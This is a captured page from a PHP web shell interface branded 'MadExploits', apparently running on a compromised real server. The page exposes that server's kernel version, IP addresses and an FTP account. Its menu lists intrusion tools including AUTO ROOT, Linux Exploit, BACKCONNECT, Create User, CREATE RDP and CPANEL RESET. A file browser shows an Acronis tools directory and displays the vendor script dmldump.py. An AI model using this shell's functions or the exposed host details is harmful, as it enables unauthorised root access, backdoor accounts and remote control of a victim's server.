Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
Acronis /
PyShell /
site-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
agents.py
36.7
KB
-rw-r--r--
amsctl.py
202.84
KB
-rw-r--r--
cep.py
26.85
KB
-rw-r--r--
change_machine_id.py
18.61
KB
-rw-r--r--
cleanup_backups.py
17.44
KB
-rw-r--r--
dmldump.py
1.61
KB
-rw-r--r--
gtobview.py
16.08
KB
-rw-r--r--
manage_creds.py
2.76
KB
-rw-r--r--
multi_mms.py
12.17
KB
-rw-r--r--
register_mms.py
1.88
KB
-rw-r--r--
set_logging.py
6.97
KB
-rw-r--r--
stdspecs.zip
13.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dmldump.py
import acrort import acrobind def main(): specs = acrobind.create_viewspec_storage('stdspecs', acrobind.dir_here()) parser = acrobind.CommandLineParser() parser.append_processor(acrobind.ConnectionArgumentsProcessor(tenancy_required=True)) parser.append_processor(acrobind.PostOfficeArgumentsProcessor(std_specs=specs.enumerate())) parser.append_processor(acrobind.OutputArgumentsProcessor()) parser.append_processor(acrobind.DebugTraceArgumentsProcessor()) try: config = parser.parse_arguments() except acrort.Exception as exception: error = exception.to_error() ret = error.to_exit_code() if ret == acrort.common.EXCEPTION_AWARE_RETURN_CODE: error.throw() return ret printer = acrobind.Output(config, end='\n\n') queue = acrort.common.Queue(sigint=True, size_limit=1) connection, error = acrobind.connect_to_service(config, queue=queue, printer=printer) if connection is None: return error.to_exit_code() post_office = acrobind.PostOffice(connection, queue) action_id = post_office.execute_request(config) on_stop = False while True: msg = queue.get() if not on_stop and acrort.common.interrupt_sentinel: on_stop = True acrort.common.cancel_action(action_id) if not on_stop or msg.type_id not in acrort.common.MESSAGE_FAMILY_DML: printer.write(msg) if msg.type_id == acrort.common.MESSAGE_TYPE_COMPLETION: break if __name__ == '__main__': exit(acrobind.interruptable_safe_execute(main))
Close